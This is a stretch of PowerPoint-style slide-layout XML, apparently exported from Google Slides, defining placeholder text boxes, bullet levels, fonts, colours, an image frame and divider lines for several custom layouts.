              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Google Shape;261;p25"/>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1">
  <p:cSld name="Custom Layout_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="262" name="Shape 262"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Google Shape;263;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630768" y="1372519"/>
            <a:ext cx="3474000" cy="2951700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="—"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="264" name="Google Shape;264;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="9" r="9" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4426519" y="1372518"/>
            <a:ext cx="4397926" cy="2931938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Google Shape;265;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="730497"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Google Shape;268;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p26"/>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270" name="Shape 270"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;271;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="744575"/>
            <a:ext cx="8520600" cy="2052600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">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272" name="Google Shape;272;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2834125"/>
            <a:ext cx="8520600" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">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273" name="Google Shape;273;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472458" y="4663217"/>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2 1">
  <p:cSld name="CUSTOM_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="27" name="Shape 27"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Google Shape;28;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286919" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="000D74"/>
              </a:solidFill>
              <a:latin typeface="Inter SemiBold"/>
              <a:ea typeface="Inter SemiBold"/>
              <a:cs typeface="Inter SemiBold"/>
              <a:sym typeface="Inter SemiBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Google Shape;29;p4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="758040"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Google Shape;30;p4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4146056" y="1597376"/>
            <a:ext cx="3850800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="7150">
            <a:solidFill>
              <a:srgbClr val="6CADDF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Google Shape;31;p4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4180088" y="3705930"/>
            <a:ext cx="3850800" cy="0"/>
          </a:xfrm>
